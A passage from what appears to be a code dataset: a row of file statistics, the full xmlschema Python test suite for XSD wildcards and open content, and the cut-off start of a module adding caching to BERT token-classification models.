| 52.370909 | 148 | 0.72108 | 1,550 | 14,402 | 6.374194 | 0.106452 | 0.089474 | 0.072267 | 0.082591 | 0.904352 | 0.900304 | 0.886336 | 0.858401 | 0.821862 | 0.821862 | 0 | 0.007845 | 0.22108 | 14,402 | 274 | 149 | 52.562044 | 0.872883 | 0.204694 | 0 | 0.513369 | 1 | 0 | 0.087131 | 0.059395 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074866 | false | 0 | 0.016043 | 0.032086 | 0.139037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
538a025b66c16a1ebbaab61111a1b8fbef70914c | 34,303 | py | Python | tests/validators/test_wildcards.py | YVautrin/xmlschema | c0363bc56b1371ba4904ad5aeb1c3c3dee227350 | [
"MIT"
] | 176 | 2019-07-08T00:15:03.000Z | 2022-03-24T14:17:42.000Z | tests/validators/test_wildcards.py | YVautrin/xmlschema | c0363bc56b1371ba4904ad5aeb1c3c3dee227350 | [
"MIT"
] | 168 | 2019-07-01T14:49:03.000Z | 2022-03-28T10:55:38.000Z | tests/validators/test_wildcards.py | YVautrin/xmlschema | c0363bc56b1371ba4904ad5aeb1c3c3dee227350 | [
"MIT"
] | 44 | 2019-08-21T22:59:02.000Z | 2022-02-28T08:50:13.000Z | #!/usr/bin/env python
#
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
import unittest
from xmlschema import XMLSchemaParseError
from xmlschema.validators import XMLSchema11, XsdDefaultOpenContent
from xmlschema.testing import XsdValidatorTestCase
class TestXsdWildcards(XsdValidatorTestCase):
def test_parsing(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any namespace=" ##any "/>
<xs:any namespace="##local"/>
<xs:any namespace="##other"/>
<xs:any namespace="##targetNamespace foo bar"/>
<xs:any namespace="##local foo bar"/>
<xs:any namespace="##targetNamespace ##local foo bar"/>
</xs:choice>
</xs:group>
</xs:schema>""")
self.assertEqual(schema.groups['group1'][0].namespace, ('##any',))
self.assertEqual(schema.groups['group1'][1].namespace, [''])
self.assertEqual(schema.groups['group1'][2].namespace, ['##other'])
self.assertEqual(schema.groups['group1'][3].namespace, ['tns1', 'foo', 'bar'])
self.assertEqual(schema.groups['group1'][4].namespace, ['', 'foo', 'bar'])
self.assertEqual(schema.groups['group1'][5].namespace, ['tns1', '', 'foo', 'bar'])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any namespace="##all"/>
<xs:any processContents="any"/>
</xs:choice>
</xs:group>
</xs:schema>""", validation='lax')
errors = schema.all_errors
self.assertIn("wrong value '##all' in 'namespace' attribute", str(errors[1]))
self.assertIn("value must be one of ['skip'", str(errors[0]))
def test_overlap(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any namespace="##local"/>
<xs:any namespace="##other"/>
<xs:any namespace="##targetNamespace foo bar"/>
</xs:choice>
</xs:group>
</xs:schema>""")
any1, any2, any3 = schema.groups['group1'][:]
self.assertFalse(any1.is_overlap(any2))
self.assertFalse(any2.is_overlap(any1))
self.assertTrue(any3.is_matching('{foo}x'))
self.assertTrue(any3.is_matching('{bar}x'))
self.assertTrue(any3.is_matching('{tns1}x'))
def test_any_wildcard(self):
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, ['##other'])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##targetNamespace" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, [''])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="ns ##targetNamespace" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, ['ns', ''])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="tns2 tns1 tns3" processContents="skip"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace,
['tns2', 'tns1', 'tns3'])
self.assertEqual(schema.types['taggedType'].content[-1].min_occurs, 1)
self.assertEqual(schema.types['taggedType'].content[-1].max_occurs, 1)
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any minOccurs="10" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].namespace, ('##any',))
self.assertEqual(schema.types['taggedType'].content[-1].min_occurs, 10)
self.assertIsNone(schema.types['taggedType'].content[-1].max_occurs)
def test_any_attribute_wildcard(self):
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
<xs:anyAttribute namespace="tns1:foo"/>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].attributes[None].namespace, ['tns1:foo'])
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
<xs:anyAttribute namespace="##targetNamespace"/>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].attributes[None].namespace, [''])
def test_namespace_variants(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<xs:any namespace="urn:a" processContents="skip"/>
<xs:any namespace="" processContents="lax"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
any1 = schema.groups['group1'][0]
self.assertEqual(any1.namespace, ['urn:a'])
any2 = schema.groups['group1'][1]
self.assertEqual(any2.namespace, [])
class TestXsd11Wildcards(TestXsdWildcards):
schema_class = XMLSchema11
def test_parsing(self):
super(TestXsd11Wildcards, self).test_parsing()
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:choice>
<xs:any notNamespace="##all"/>
</xs:choice>
</xs:group>
</xs:schema>""", validation='lax')
errors = schema.all_errors
self.assertIn("wrong value '##all' in 'notNamespace' attribute", str(errors[0]))
def test_is_restriction(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns1="tns1"
targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<!-- Case #1 -->
<xs:any notNamespace="tns1"/>
<xs:any notNamespace="tns1 tns2"/>
<xs:any notNamespace="tns1 tns2 tns3"/>
<!-- Case #2 -->
<xs:any namespace="##any"/>
<xs:any namespace="##local" notQName="a b"/>
<xs:any namespace="##local" notQName="##defined a b"/>
<!-- Case #3 -->
<xs:any namespace="##any" notQName="a b c d"/>
<xs:any namespace="##local" notQName="a b e"/>
<xs:any notNamespace="##local" notQName="tns1:c d e"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
any1, any2, any3 = schema.groups['group1'][:3]
self.assertEqual(repr(any1), "Xsd11AnyElement(not_namespace=['tns1'], "
"process_contents='strict', occurs=[1, 1])")
self.assertEqual(repr(any2), "Xsd11AnyElement(not_namespace=['tns1', 'tns2'], "
"process_contents='strict', occurs=[1, 1])")
self.assertTrue(any1.is_restriction(any1))
self.assertFalse(any1.is_restriction(any2))
self.assertFalse(any1.is_restriction(any3))
self.assertTrue(any2.is_restriction(any1))
self.assertTrue(any2.is_restriction(any2))
self.assertFalse(any2.is_restriction(any3))
self.assertTrue(any3.is_restriction(any1))
self.assertTrue(any3.is_restriction(any2))
self.assertTrue(any3.is_restriction(any3))
any1, any2, any3 = schema.groups['group1'][3:6]
self.assertEqual(repr(any1), "Xsd11AnyElement(namespace=('##any',), "
"process_contents='strict', occurs=[1, 1])")
self.assertEqual(repr(any2), "Xsd11AnyElement(namespace=[''], "
"process_contents='strict', occurs=[1, 1])")
self.assertTrue(any1.is_restriction(any1))
self.assertTrue(any2.is_restriction(any1))
self.assertTrue(any3.is_restriction(any1))
any1, any2, any3 = schema.groups['group1'][6:9]
self.assertFalse(any2.is_restriction(any1))
self.assertTrue(any3.is_restriction(any1))
def test_wildcard_union(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
<xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
<xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
<xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
<xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
# <xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][:2]
self.assertListEqual(any1.namespace, ['tns1'])
any1.union(any2)
self.assertListEqual(any1.namespace, ['tns1', 'tns2'])
# <xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][2:4]
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
any1.union(any2)
self.assertListEqual(any1.not_namespace, ['tns1'])
any2.union(any1)
self.assertListEqual(any2.not_namespace, ['tns1'])
# <xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][4:6]
any1.union(any2)
self.assertEqual(any1.namespace, ('##any',))
self.assertEqual(any1.not_namespace, ())
# <xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][6:8]
any1.union(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
# <xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
any1, any2 = schema.groups['group1'][8:10]
any1.union(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
any1, any2 = schema.groups['group1'][10:12]
any1.union(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['', 'tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
any1, any2 = schema.groups['group1'][12:14]
any1.union(any2)
self.assertListEqual(any1.namespace, ['##any'])
self.assertListEqual(any1.not_namespace, [])
def test_wildcard_intersection(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="tns1">
<xs:group name="group1">
<xs:sequence>
<xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
<xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
<xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
<xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
<xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
<xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
<xs:any namespace="##any" notQName="##defined qn1"/>
<xs:any namespace="##local" notQName="##defined"/>
</xs:sequence>
</xs:group>
</xs:schema>""")
# <xs:any namespace="tns1"/> <xs:any namespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][:2]
self.assertListEqual(any1.namespace, ['tns1'])
any1.intersection(any2)
self.assertListEqual(any1.namespace, ['tns1'])
# <xs:any notNamespace="tns1"/> <xs:any notNamespace="tns1 tns2"/>
any1, any2 = schema.groups['group1'][2:4]
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1'])
any1.intersection(any2)
self.assertListEqual(any1.not_namespace, ['tns1', 'tns2'])
any2.intersection(any1)
self.assertListEqual(any2.not_namespace, ['tns1', 'tns2'])
# <xs:any namespace="##any"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][4:6]
any1.intersection(any2)
self.assertEqual(any1.namespace, [])
self.assertEqual(any1.not_namespace, ['tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="tns1"/>
any1, any2 = schema.groups['group1'][6:8]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1', ''])
# <xs:any notNamespace="tns1"/> <xs:any namespace="##other"/>
any1, any2 = schema.groups['group1'][8:10]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns1', ''])
# <xs:any namespace="##other"/> <xs:any notNamespace="##local tns1"/>
any1, any2 = schema.groups['group1'][10:12]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['', 'tns1'])
# <xs:any namespace="##other"/> <xs:any notNamespace="tns2"/>
any1, any2 = schema.groups['group1'][12:14]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [])
self.assertListEqual(any1.not_namespace, ['tns2', 'tns1', ''])
# <xs:any namespace="##any" notQName="##defined qn1"/>
# <xs:any namespace="##local" notQName="##defined"/>
any1, any2 = schema.groups['group1'][14:16]
any1.intersection(any2)
self.assertListEqual(any1.namespace, [''])
self.assertListEqual(any1.not_qname, ['##defined', 'qn1'])
def test_open_content_mode_interleave(self):
schema = self.check_schema("""
<xs:element name="Book">
<xs:complexType>
<xs:openContent mode="interleave">
<xs:any />
</xs:openContent>
<xs:sequence>
<xs:element name="Title" type="xs:string"/>
<xs:element name="Author" type="xs:string" />
<xs:element name="Date" type="xs:gYear"/>
<xs:element name="ISBN" type="xs:string"/>
<xs:element name="Publisher" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>""")
self.assertEqual(schema.elements['Book'].type.open_content.mode, 'interleave')
self.assertEqual(schema.elements['Book'].type.open_content.any_element.min_occurs, 0)
self.assertIsNone(schema.elements['Book'].type.open_content.any_element.max_occurs)
schema = self.check_schema("""
<xs:complexType name="name">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['name'].open_content.mode, 'interleave')
self.check_schema("""
<xs:complexType name="name">
<xs:openContent />
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_mode_suffix(self):
schema = self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix">
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['name'].open_content.mode, 'suffix')
self.assertEqual(schema.types['name'].open_content.any_element.min_occurs, 0)
self.assertIsNone(schema.types['name'].open_content.any_element.max_occurs)
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix"/>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_mode_none(self):
schema = self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="none"/>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['name'].open_content.mode, 'none')
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="none">
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_allowed(self):
self.check_schema("""
<xs:complexType name="choiceType">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:choice>
<xs:element name="a" type="xs:float"/>
<xs:element name="b" type="xs:string"/>
<xs:element name="c" type="xs:int"/>
</xs:choice>
</xs:complexType>""")
def test_open_content_not_allowed(self):
self.check_schema("""
<xs:complexType name="wrongType">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:simpleContent>
<xs:restriction base="xs:string" />
</xs:simpleContent>
</xs:complexType>""", XMLSchemaParseError)
self.check_schema("""
<xs:complexType name="wrongType">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:complexContent>
<xs:restriction base="xs:anyType" />
</xs:complexContent>
</xs:complexType>""", XMLSchemaParseError)
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:openContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:element name="root" />
</xs:schema>""")
def test_open_content_wrong_attributes(self):
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="wrong"/>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix">
<xs:any minOccurs="1" namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
self.check_schema("""
<xs:complexType name="name">
<xs:openContent mode="suffix">
<xs:any maxOccurs="1000" namespace="##other" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="given" type="xs:string"/>
<xs:element name="middle" type="xs:string" minOccurs="0"/>
<xs:element name="family" type="xs:string"/>
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
def test_default_open_content(self):
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
self.assertIsInstance(schema.default_open_content, XsdDefaultOpenContent)
self.assertFalse(schema.default_open_content.applies_to_empty)
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent appliesToEmpty="true">
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
self.assertTrue(schema.default_open_content.applies_to_empty)
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent appliesToEmpty="wrong">
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="root" />
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:defaultOpenContent>
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
<xs:element name="root" />
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="root" />
<xs:defaultOpenContent mode="wrong">
<xs:any namespace="##other" processContents="skip"/>
</xs:defaultOpenContent>
</xs:schema>""")
with self.assertRaises(XMLSchemaParseError):
self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="root" />
<xs:defaultOpenContent mode="none" />
</xs:schema>""")
def test_open_content_restriction(self):
schema = self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent>
<xs:any namespace="tns1 tns2" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:restriction base="baseType">
<xs:openContent>
<xs:any namespace="tns1" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:restriction>
</xs:complexContent>
</xs:complexType>""")
self.assertEqual(schema.types['derivedType'].content[0].name, 'foo')
self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent>
<xs:any namespace="tns1 tns2" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:restriction base="baseType">
<xs:openContent>
<xs:any namespace="##any" processContents="skip"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:restriction>
</xs:complexContent>
</xs:complexType>""", XMLSchemaParseError)
def test_open_content_extension(self):
schema = self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent mode="suffix">
<xs:any namespace="tns1" processContents="lax"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:extension base="baseType">
<xs:openContent>
<xs:any namespace="tns1 tns2" processContents="lax"/>
</xs:openContent>
<xs:sequence>
<xs:element name="bar" type="xs:string"/>
</xs:sequence>
</xs:extension>
</xs:complexContent>
</xs:complexType>""")
self.assertEqual(schema.types['derivedType'].content[0][0].name, 'foo')
self.assertEqual(schema.types['derivedType'].content[1][0].name, 'bar')
self.check_schema("""
<xs:complexType name="baseType">
<xs:openContent mode="interleave">
<xs:any namespace="tns1" processContents="lax"/>
</xs:openContent>
<xs:sequence>
<xs:element name="foo" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="derivedType">
<xs:complexContent>
<xs:extension base="baseType">
<xs:openContent>
<!-- processContents="strict" is more restrictive -->
<xs:any namespace="tns1 tns2" processContents="strict"/>
</xs:openContent>
<xs:sequence>
<xs:element name="bar" type="xs:string"/>
</xs:sequence>
</xs:extension>
</xs:complexContent>
</xs:complexType>""", XMLSchemaParseError)
def test_not_qname_attribute(self):
self.assertIsInstance(self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:ns="tns1" targetNamespace="tns1">
<xs:complexType name="type1">
<xs:openContent>
<xs:any notQName="ns:a" processContents="lax" />
</xs:openContent>
</xs:complexType>
</xs:schema>"""), XMLSchema11)
self.assertIsInstance(self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:ns="tns1" targetNamespace="tns1">
<xs:complexType name="type1">
<xs:sequence>
<xs:any notQName="ns:a" processContents="lax" />
</xs:sequence>
</xs:complexType>
</xs:schema>"""), XMLSchema11)
self.check_schema("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:group name="group1">
<xs:sequence>
<xs:any notNamespace="##local" notQName="c d e"/>
</xs:sequence>
</xs:group>
</xs:schema>""", XMLSchemaParseError)
def test_any_wildcard(self):
super(TestXsd11Wildcards, self).test_any_wildcard()
self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" notNamespace="##targetNamespace" />
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any notNamespace="##targetNamespace" />
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].not_namespace, [''])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:tns1="tns1" targetNamespace="tns1">
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##targetNamespace" notQName="tns1:foo tns1:bar"/>
</xs:sequence>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['taggedType'].content[-1].not_qname,
['{tns1}foo', '{tns1}bar'])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:tns1="tns1" targetNamespace="tns1">
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##targetNamespace"
notQName="##defined tns1:foo ##definedSibling"/>
</xs:sequence>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['taggedType'].content[-1].not_qname,
['##defined', '{tns1}foo', '##definedSibling'])
def test_any_attribute_wildcard(self):
super(TestXsd11Wildcards, self).test_any_attribute_wildcard()
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:tns1="tns1" targetNamespace="tns1">
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
<xs:anyAttribute notQName="tns1:foo"/>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['taggedType'].attributes[None].namespace, ('##any',))
self.assertEqual(schema.types['taggedType'].attributes[None].not_qname, ['{tns1}foo'])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:complexType name="barType">
<xs:anyAttribute notNamespace="tns1"/>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['barType'].attributes[None].not_namespace, ['tns1'])
self.assertEqual(repr(schema.types['barType'].attributes[None]),
"Xsd11AnyAttribute(not_namespace=['tns1'], process_contents='strict')")
if __name__ == '__main__':
import platform
header_template = "Test xmlschema's XSD wildcards with Python {} on {}"
header = header_template.format(platform.python_version(), platform.platform())
print('{0}\n{1}\n{0}'.format("*" * len(header), header))
unittest.main()
| 42.245074 | 96 | 0.563974 | 3,508 | 34,303 | 5.45667 | 0.062144 | 0.032128 | 0.059241 | 0.031449 | 0.878801 | 0.823059 | 0.784662 | 0.741981 | 0.701755 | 0.687337 | 0 | 0.023285 | 0.268869 | 34,303 | 811 | 97 | 42.297164 | 0.739952 | 0.036906 | 0 | 0.732374 | 0 | 0.011511 | 0.635192 | 0.08651 | 0 | 0 | 0 | 0 | 0.155396 | 1 | 0.030216 | false | 0 | 0.007194 | 0 | 0.041727 | 0.001439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
539ad43c1ec30c7c01590cc967a03bb5fdc596ff | 32,106 | py | Python | src/ue4nlp/transformers_cached.py | AIRI-Institute/uncertainty_transformers | 982b5ae8b39cb484ce3559a72f95d18f30487e38 | [
"MIT"
] | null | null | null | src/ue4nlp/transformers_cached.py | AIRI-Institute/uncertainty_transformers | 982b5ae8b39cb484ce3559a72f95d18f30487e38 | [
"MIT"
] | null | null | null | src/ue4nlp/transformers_cached.py | AIRI-Institute/uncertainty_transformers | 982b5ae8b39cb484ce3559a72f95d18f30487e38 | [
"MIT"
] | null | null | null | from typing import Optional
import torch
import torch.nn as nn
from torch.nn import (
CrossEntropyLoss,
BCEWithLogitsLoss,
MSELoss,
)
from transformers import (
BertForTokenClassification,
BertForSequenceClassification,
DistilBertForTokenClassification,
ElectraForTokenClassification,
ElectraForSequenceClassification,
RobertaForSequenceClassification,
DebertaForSequenceClassification,
DebertaForTokenClassification,
DistilBertForSequenceClassification,
DistilBertForTokenClassification,
)
from transformers.modeling_outputs import (
SequenceClassifierOutput,
BaseModelOutputWithPoolingAndCrossAttentions,
)
class BertForTokenClassificationCached(BertForTokenClassification):
def __init__(self, config):
super().__init__(config)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.cache_size = None
self.empty_cache()
